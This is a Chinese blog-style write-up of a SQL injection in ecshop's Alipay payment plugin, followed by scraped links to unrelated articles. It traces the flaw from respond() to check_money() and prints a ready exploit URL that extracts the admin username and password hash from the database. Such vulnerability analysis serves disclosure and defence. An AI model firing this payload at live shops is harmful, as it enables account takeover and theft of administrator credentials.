360独家原创,发现到支付宝漏洞,马上铺天盖地,到处都在宣传,可谓360的营销策略很彪悍。这里ecshop模板网告诫大家, 发现漏洞,不用多担心!采用ecshop我们独立开发的防注入系统,出现漏洞也不怕。 目前所有商业整站,全部都已升级上防注入功能。

这里总结下该漏洞。因为缝隙源于ecshop的付出宝付出插件,一切使用条件是站点装置此插件,使用不受GPC影响。缝隙中心代码在\includes\modules\payment\alipay.php 文件 respond()函数,第215行。

function respond()    {

if (!empty($_POST))

{

foreach($_POST as $key => $data)

{

$_GET[$key] = $data;

}

}

$payment  = get_payment($_GET['code']);

$seller_email = rawurldecode($_GET['seller_email']);

$order_sn = str_replace($_GET['subject'], '', $_GET['out_trade_no']);

$order_sn = trim($order_sn);

/* 检查支付的金额是否相符 */

if (!check_money($order_sn, $_GET['total_fee']))

{

$order_sn变量由str_replace($_GET['subject'], ”, $_GET['out_trade_no']);操控,咱们能够经过$_GET['subject']参数来替换掉$_GET['out_trade_no']参数里边的反斜杠\。

结尾$order_sn被带入check_money()函数。咱们跟进看一下

在include\lib_payment.php文件中109行.

functioncheck_money($log_id,$money){$sql='SELECT order_amount FROM '.$GLOBALS['ecs']->table('pay_log')." WHERE log_id = '$log_id'";$amount=$GLOBALS['db']->getOne($sql);if($money==$amount){/*----省略----*/

原来的$order_sn被带入了数据库。

调用respond()函数的文件是respond.php,所以要在respond.php文件使用。

结尾使用EXP:

http://localhost/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (sel ect * from (sel ect count(*),concat(floor(rand(0)*2),(sel ect concat(user_name,password) from ecs_admin_user limit 1))a from information_schema.tables group by a)b) — By ecshop.co/

ecshop 360支付宝插件漏洞+ flow.php注入漏洞,ecshop支付宝注入漏洞分析相关推荐

  1. android支付宝插件,GitHub - DmcSDK/cordova.plugin.alipay: cordova 支付宝支付插件,支持IOS Android。...

    cordova.plugin.alipay cordova 支付宝支付插件 cordova plugin add https://github.com/DmcSDK/cordova.plugin.al ...

  2. Ecshop支付宝插件SQL注入及漏洞利用(exp)

     0x00 在\includes\modules\payment\alipay.php文件中,有一个response函数用来处理支付信息,在ECSHOP的init初始化文件中,默认是做了全局转义的 ...

  3. ECshop 快捷登录插件 支持QQ 支付宝 微博

    亲自测试可以使用,分享给大家.(承接各种EcShop改版,二次开发等相关项目 QQ:377898650) 安装的时候按照里面说明.安装即可. 代码下载:http://pan.baidu.com/s/1 ...

  4. 【安全漏洞】DedeCMS-5.8.1 SSTI模板注入导致RCE

    漏洞类型 SSTI RCE 利用条件 影响范围应用 漏洞概述 2021年9月30日,国外安全研究人员Steven Seeley披露了最新的DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导 ...

  5. php缓存注入,利用Thinkphp 5缓存漏洞实现前台Getshell

    原标题:利用Thinkphp 5缓存漏洞实现前台Getshell *本文原创作者:WindWing,属于FreeBuf原创奖励计划,禁止转载 0×00 背景 网站为了实现加速访问,会将用户访问过的页面 ...

  6. phpcms前台注入导致任意文件读取漏洞

    关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...

  7. php 越权 漏洞,PHPYUN最新版多处SQL注入及越权操作二

    ### 简要描述: PHPYUN最新版(phpyun_v3.1.0604_gbk)多处SQL注入及越权操作 虽然PHPYUN在注入防御上已经做得很不错了,方的很严格,像吃掉引号,宽字节的基本上很少了, ...

  8. 【web-攻击用户】(9.6.2)其他客户端注入攻击:开放式重定向漏洞

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

  9. 360加速插件谷歌字体服务停止运行

    相信有很多wordpress博客都在使用360的字体加速服务,在谷歌字体被墙时为站长提升加载提速的服务.就在8月31号360团队发出了停止运行的公告: 网站卫士前端公共库停止运行公告 感谢您一直以来给 ...

最新文章

  1. Java网络编程之简单UDP通信
  2. 003-代码补全,运行,调试
  3. 【千字分析】剑指 Offer 47. 礼物的最大价值
  4. Mongodb 笔记04 特殊索引和集合、聚合、应用程序设计
  5. 子类覆盖父类(Java)
  6. C/C++对象的序列化
  7. 【Java】开源工具 Hutool 不糊涂
  8. 雷军这么努力,为什么还是干不过 OV?
  9. C# 中格式化字符串中包含 { 或者 } 如何转义?
  10. Windows核心编程_Edit操作
  11. 论文笔记_S2D.30_2017-CSVT_使用全卷积深度残差网络,作为分类问题,从单目图像估计深度
  12. 利用CodeBlocks创建C语言项目
  13. python采集修改原创_火车头采集标题如何伪原创(附教程)
  14. 打开栅格数据的正确方式
  15. 阅读《我喜欢生命本来的样子》完(四)
  16. Parameter specified as non-null is null method kotlin.jvm.internal.Intrinsics.checkNotNullParameter
  17. 【Android】iOS开发中xconfig和script脚本的使用
  18. 复合型网络拓扑结构图_网络拓扑结构大全和图片(星型、总线型、环型、树型、分布式、网状拓扑结构)....
  19. 【高德地图API】绘制大地线 Geodesic/Great Circles
  20. delphi取得进程与线程的CPU使用率

热门文章

  1. VS:使用一个pros文件在Debug和Release下配置opencv
  2. Web图片分享与管理程序生成工具
  3. 在学术领域认为能展现出智能行为的计算机,2021国家公务员考试行测模拟题(二)...
  4. 用Javascript实现中秋节倒计时
  5. php不报错该怎么办,探寻PHP脚本不报错的原因
  6. 记录:指针仪表盘视觉读取项目的学习过程
  7. java正则表达式匹配路径_正则表达式教程之位置匹配详解
  8. shiftdim matlab,科学网—matlab函数(矩阵相关) - 黄妮妮的博文
  9. Syschronized同步锁和lock同步锁的区别
  10. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)